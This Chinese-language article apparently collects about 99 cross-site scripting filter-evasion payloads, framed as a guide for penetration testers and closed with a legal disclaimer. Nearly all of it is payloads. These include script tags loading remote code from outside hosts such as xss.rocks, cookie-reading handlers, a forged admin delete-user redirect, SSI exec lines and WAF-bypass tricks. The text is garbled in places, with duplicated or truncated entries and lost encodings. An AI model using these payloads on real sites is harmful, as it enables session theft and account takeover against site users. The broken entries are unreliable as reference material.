尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
网络安全入门,XSS攻击
以下是一些具体的XSS绕过过滤的方法:
1. XSS定位器
在大多数存在漏洞的地方,插入以下代码将弹出含有“XSS”字样的对话框。建议使用URL编码器对整个代码进行编码。
小贴士:如果想快速检查页面,可以插入“<任意文本>”,然后观察页面输出是否有明显变化,以判断是否存在漏洞。
以下为具体代码实现:
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2. 简短的XSS定位器
若页面空间有限且无JavaScript漏洞,以下简短的字符串可用于快速检测XSS注入。注入后查看页面源代码,检查是否出现**<XSS** 或 <XSS 字样。
”;!–”<XSS>=&{()}
3. 无过滤绕过
这是一个标准的XSS注入代码,通常会被防御,但建议先测试一下。
<SCRIPT SRC=http://127.0.0.1/xss.js></SCRIPT>
4. 利用多语言进行过滤绕过
利用多种语言特性,可以绕过过滤机制。以下为示例代码:
‘”>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script>
<script>alert(document.cookie)</script>”>
<img/id=”confirm(1)”/alt=”/”src=”/”onerror=eval(id)>’”>
<img src=”https://www.fujieace.com/wp-content/images/2015/07/hacked-compressor.jpg“>
5. 通过JavaScript命令实现的图片XSS
图片注入使用JavaScript命令实现,适用于大多数浏览器环境。示例代码如下:
<IMG SRC=”javascript:alert(‘XSS’);”>
6. 无分号无引号
不使用分号和引号的XSS攻击示例:
<IMG SRC=javascript:alert(‘XSS’)>
7. 不区分大小写的XSS攻击向量
XSS攻击向量,不区分JavaScript函数的大小写:
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8. HTML实体
使用HTML实体进行XSS攻击,需要分号以生效:
<IMG SRC=javascript:alert("XSS")>
9. 重音符混淆
当需要在JavaScript代码中同时使用单引号和双引号时,可使用重音符(`)包含代码:
<IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
10. 畸形的A标签
通过跳过HREF标签找到XSS漏洞的方法:
```
<a onmouseover=”alert(document.cookie)”>xxs link</a>
```
11. 畸形的IMG标签
通过不严格的HTML解析来构建含有IMG标签的XSS攻击向量:
```
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
```
12. fromCharCode函数
如果不允许使用引号,可以使用JavaScript的fromCharCode函数创建XSS攻击向量:
```
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
```
13. 使用默认SRC属性绕过SRC域名过滤器
这种方法可以绕过大多数SRC域名过滤器,适用于任何HTML标签:
```
<IMG SRC=# onmouseover=”alert(‘xxs’)”>
```
14. 使用默认为空的SRC属性
```
<IMG SRC= onmouseover=”alert(‘xxs’)”>
```
15. 使用不含SRC属性
```
<IMG onmouseover=”alert(‘xxs’)”>
```
16. 通过error事件触发alert
```
<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
```
17. 对IMG标签中onerror属性进行编码
```
<img src=x onerror=”javascript:alert('XSS')″>
```
18. 十进制HTML字符实体编码
这种编码方式在某些浏览器中不支持直接使用javascript:形式的XSS示例:
```
<IMG SRC=javascript:alert('XSS')>
```
19. 不带分号的十进制HTML字符实体编码
这种编码方式适用于绕过特定形式的XSS过滤:
```
<IMG SRC=javascript:alert('XSS')>
```
20. 不带分号的十六进制HTML字符实体编码
```
<IMG SRC=javascript:alert&#x
```
20. 不带分号的十六进制HTML字符实体编码
此方法绕过某些假设字符实体编码需要用分号结尾的过滤器:
<IMG SRC=javascript:alert('XSS')>
21. 内嵌TAB
使用TAB字符分隔XSS攻击代码,适用于某些解析环境:
<IMG SRC=”jav ascript:alert(‘XSS’);”>
22. 内嵌编码后的TAB
使用编码后的TAB字符分隔XSS攻击代码:
<IMG SRC=”jav	ascript:alert(‘XSS’);”>
23. 内嵌换行分隔XSS攻击代码
利用换行字符分隔代码,仅特定字符有效:
<IMG SRC=”jav
ascript:alert(‘XSS’);”>
24. 内嵌回车分隔XSS攻击代码
使用回车字符分隔,注意字符长度:
<IMG SRC=”jav
ascript:alert(‘XSS’);”>
25. 使用空字符分隔JavaScript指令
空字符也可以用作XSS攻击,需要特殊工具或编码:
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
26. 利用IMG标签中JavaScript指令前的空格和元字符
如果过滤器不计算“javascript:”前的空格,这种方法将有效:
<IMG SRC=”  javascript:alert(‘XSS’);”>
27. 利用非字母非数字字符
某些浏览器的HTML解析器认为非字母非数字字符作为空白或无效符号,而XSS过滤器可能未考虑此情况:
<SCRIPT/XSS SRC=”http://xss.rocks/xss.js“></SCRIPT>
28. 额外的尖括号
通过在XSS攻击向量中添加额外的尖括号来绕过某些检测引擎:
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
29. 未闭合的script标签
在某些浏览器中,未闭合的标签会被自动闭合,这为XSS提供了机会:
<SCRIPT SRC=http://127.0.0.1/xss.js?< B >
30. script标签中的协议解析
特定的协议解析方式可以绕过过滤器,特别适用于空间有限的情况:
<SCRIPT SRC=//xss.rocks/.j>
31. 只含左尖括号的HTML/JavaScript XSS向量
在某些浏览器中,不需要闭合标签的右尖括号就可以执行XSS攻击:
<IMG SRC=”javascript:alert(‘XSS’)”
32. 多个左尖括号
使用多个左尖括号作为标签结尾在不同浏览器中有不同的效果:
<iframe src=http://127.0.0.1/scriptlet.html <
33. JavaScript双重转义
当应用将用户输入输出到页面上时,双重转义可能会触发XSS攻击:
\”;alert(‘XSS’);//
</script><script>alert(‘XSS‘)
```
## 33. JavaScript双重转义
当应用错误地转义用户输入时,可以通过双重转义进行XSS攻击:
## 34. 闭合title标签
通过闭合title标签进行XSS攻击:
```
35. INPUT image
利用输入类型为image的INPUT标签执行XSS:
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
36. BODY image
在BODY标签的BACKGROUND属性中插入XSS代码:
<BODY BACKGROUND="javascript:alert('XSS')">
37. IMG Dynsrc
通过IMG标签的DYNSRC属性实施XSS攻击:
<IMG DYNSRC="javascript:alert('XSS')">
38. IMG lowsrc
利用IMG标签的LOWSRC属性进行XSS注入:
<IMG LOWSRC="javascript:alert('XSS')">
39. List-style-image
通过样式属性中的list-style-image进行XSS攻击,仅在特定浏览器环境下有效:
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
40. 图片中引用VBscript
利用VBScript在IMG标签中执行XSS:
<IMG SRC='vbscript:msgbox("XSS")'>
41. Livescript (仅限旧版本Netscape)
在老版本的Netscape浏览器中,通过Livescript执行XSS:
<IMG SRC="livescript:[code]">
42. SVG对象标签
使用SVG标签触发XSS攻击:
<svg/onload=alert('XSS')>
43. ECMAScript 6
利用ECMAScript 6特性构造XSS攻击:
Set.constructor`alert\x28document.domain\x29```
44. BODY标签
通过BODY标签的事件处理器实现XSS攻击,无需"javascript:"前缀:
<BODY ONLOAD=alert('XSS')>
45. 事件处理程序
XSS攻击可以利用多种HTML事件,以下是部分事件列表:
- onAbort()
- onActivate()
- onAfterPrint()
- … 更多事件 …
46. BGSOUND标签
利用BGSOUND标签在某些浏览器中实现XSS:
<BGSOUND SRC="javascript:alert('XSS');">
47. & JavaScript包含
使用&字符和JavaScript结合构造XSS攻击:
<BR SIZE="&{alert('XSS')}">
48. 样式表
利用LINK标签的HREF属性指向JavaScript进行XSS注入:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
49. 远程样式表
利用远程样式表插入XSS代码,特定环境下有效:
<LINK REL="stylesheet" HREF="http://127.0.0.1/xss.css">
50. 远程样式表2
使用STYLE标签和@import规则加载包含XSS代码的远程样式表:
<STYLE>@import'http://127.0.0.1/xss.css';</STYLE>
51. 远程样式表3
在特定浏览器中,使用META标签设置Link头部实施XSS:
<META HTTP-EQUIV="Link" Content="<http://127.0.0.1/xss.css>; REL=stylesheet">
52. 远程样式表4
在Gecko渲染引擎下利用STYLE标签和-moz-binding属性进行XSS攻击:
<STYLE>BODY{-moz-binding:url("https://127.0.0.1/xssmoz.xml#xss")}</STYLE>
53. 含有分隔JavaScript的STYLE标签
利用特殊的字符序列在STYLE标签内部分隔JavaScript代码,适用于IE环境:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
54. STYLE属性中使用注释分隔表达式
利用注释分隔的方式在IMG标签的STYLE属性中插入XSS代码:
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
55. 含表达式的IMG STYLE
将XSS代码嵌入到IMG标签的STYLE属性中,适用于IE环境:
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
56. STYLE标签(仅旧版本Netscape可用)
在旧版本Netscape浏览器中,使用STYLE标签执行JavaScript代码:
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
57. 使用背景图像的STYLE标签
利用STYLE标签设置背景图像为JavaScript代码:
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
58. 使用背景的STYLE标签
通过BODY标签的STYLE属性设置背景图像执行JavaScript代码:
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
59. 含STYLE属性的HTML任意标签
在任意HTML标签的STYLE属性中嵌入JavaScript代码,适用于IE环境:
<XSS STYLE="behavior: url(xss.htc);">
60. 本地htc文件
通过本地htc文件执行XSS代码,需要与XSS攻击向量在相同服务器上:
<XSS STYLE="behavior: url(xss.htc);">
61. US-ASCII编码
使用US-ASCII编码执行XSS攻击,适用于使用该编码的服务器环境:
¼script¾alert(¢XSS¢)¼/script¾
62. META标签
使用META标签进行页面刷新并执行JavaScript代码:
<META HTTP
62. META标签
使用META标签的刷新功能执行JavaScript代码:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
63. 使用数据的META
通过META标签和data URL scheme实现XSS攻击,不包含可见的SCRIPT单词或JavaScript指令:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
64. 含有额外URL参数的META
通过在META标签中包含额外的URL参数绕过URL检查:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
65. IFRAME
在允许IFRAME的情况下,通过IFRAME标签实现XSS:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
66. 基于事件的IFRAME
利用事件触发器在IFRAME标签中执行XSS代码:
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
67. FRAME
与IFRAME类似,FRAME标签也可用于XSS攻击:
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
68. TABLE
通过TABLE标签的BACKGROUND属性插入XSS代码:
<TABLE BACKGROUND="javascript:alert('XSS')">
69. TD
利用TD标签的BACKGROUND属性进行XSS攻击:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
70. DIV背景图像
在DIV标签的STYLE属性中设置背景图像为JavaScript代码:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
71. 含有Unicode XSS利用代码的DIV背景图像
使用Unicode字符对URL参数进行混淆,以实现XSS攻击:
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
72. 含有额外字符的DIV背景图像
在DIV标签中利用额外字符实现XSS攻击:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
73. DIV表达式
利用DIV标签的STYLE属性中的表达式实现XSS攻击:
<DIV STYLE="width: expression(alert('XSS'));">
74. HTML条件注释块
利用HTML条件注释在特定浏览器中执行XSS代码:
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
75. BASE标签
使用BASE标签改变页面的基本URL,以实施XSS攻击:
<BASE HREF="javascript:alert('XSS');//">
76. OBJECT标签
利用OBJECT标签加载含有XSS代码的外部资源:
<OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1/scriptlet.html"></OBJECT>
77. 使用EMBED标签加载含有XSS的FLASH文件
通过EMBED标签加载含有XSS代码的FLASH文件,适用于特定浏览器环境:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
78. 使用EMBED SVG包含攻击向量
在特定浏览器下,使用EMBED标签加载SVG代码实现XSS攻击:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
79. 在FLASH中使用ActionScript混淆XSS攻击向量
利用FLASH文件中的ActionScript代码进行混淆,以绕过过滤器:
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
80. CDATA混淆的XML数据岛
在特定环境下,利用XML数据岛和CDATA混淆实现XSS攻击:
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
81. 使用XML数据岛生成含内嵌JavaScript的本地XML文件
通过本地XML文件包含JavaScript代码实施XSS攻击:
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
82. XML中使用HTML+TIME
利用HTML+TIME扩展在XML中嵌入JavaScript代码:
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
83. 使用一些字符绕过".js"过滤
通过改名将JavaScript文件伪装成图像文件,以绕过过滤器:
<SCRIPT SRC="http://127.0.0.1/xss.jpg"></SCRIPT>
84. SSI(服务器端脚本包含)
如果服务器端允许SSI,可以利用它执行XSS攻击:
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1/xss.js></SCRIPT>'"-->
85. PHP
在服务器端安装了PHP的情况下,可以利用PHP脚本实施XSS攻击:
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
86. 嵌入命令的IMAGE
利用IMAGE标签在密码保护页面上执行命令,适用于管理员权限环境:
<IMG SRC="https://www.fujieace.com/somecommand.php?somevariables=maliciouscode">
87. 嵌入命令的IMAGE II
通过重定向图片到特定命令,可以在普通的图片请求中隐藏XSS攻击:
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
88. Cookie篡改
利用META标签覆写cookie,适用于某些特定场景:
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
89. UTF-7编码
在页面未指定编码或浏览器设置为UTF-7编码时,可以利用UTF-7执行XSS攻击:
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
90. 利用HTML引号包含的XSS
在某些浏览器中,可以通过特定的引号使用方式绕过XSS过滤器:
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
<SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT>
91. URL字符绕过
使用不同的编码和格式化方式绕过URL过滤:
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
92. 字符转义表
通过不同的字符组合实现“<”的所有可能表示,用于绕过过滤器:
<
%3C
<
<
... 等等 ...
93. 绕过WAF的方法
利用特定技巧绕过Web应用程序防火墙(WAF),包括存储型XSS、基于DOM的XSS、请求重定向等多种方法:
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
... 更多示例 ...
94. 存储型XSS
如果XSS代码已经绕过了输入过滤并存储在服务器上,WAF可能无法在输出时阻止它。
95. 基于JavaScript的反射型XSS
示例:在脚本中使用setTimeout函数,根据GET参数动态设置延时。
<script> ... setTimeout("writetitle()", $_GET[xss]) ... </script>
96. 基于DOM的XSS
示例:在脚本中直接执行GET参数的内容。
<script> ... eval($_GET[xss]); ... </script>
97. 通过请求重定向构造XSS
示例:在服务器端脚本中,基于用户输入构造重定向。
header('Location: '.$_GET['param']);
98. 利用不过滤特定字符串的WAF
有些WAF可能不会过滤某些特定的字符串或脚本结构,可以利用这一点构造XSS攻击。
<Img src=x onerror="javascript: window.onerror = alert; throw XSS">
<Video> <source onerror="javascript: alert(XSS)">
... 更多示例 ...
99. Alert混淆以绕过过滤器
通过变换alert函数的调用方式,绕过对alert关键字的过滤。
(alert)(1)
a=alert,a(1)
[1].find(alert)
... 更多示例 ...
以上提到的XSS攻击技巧和方法,都是为了帮助安全专家更好地理解和预防XSS漏洞。强调这些技术仅用于教育和安全测试目的,任何非法使用都是不道德的,可能会导致严重的法律后果。安全研究员和渗透测试人员应在合法和道德的框架内操作,确保网络空间的安全和稳定。
网络安全学习路线
网安入门资料
收集了一些入门视频资料,可以免费分享。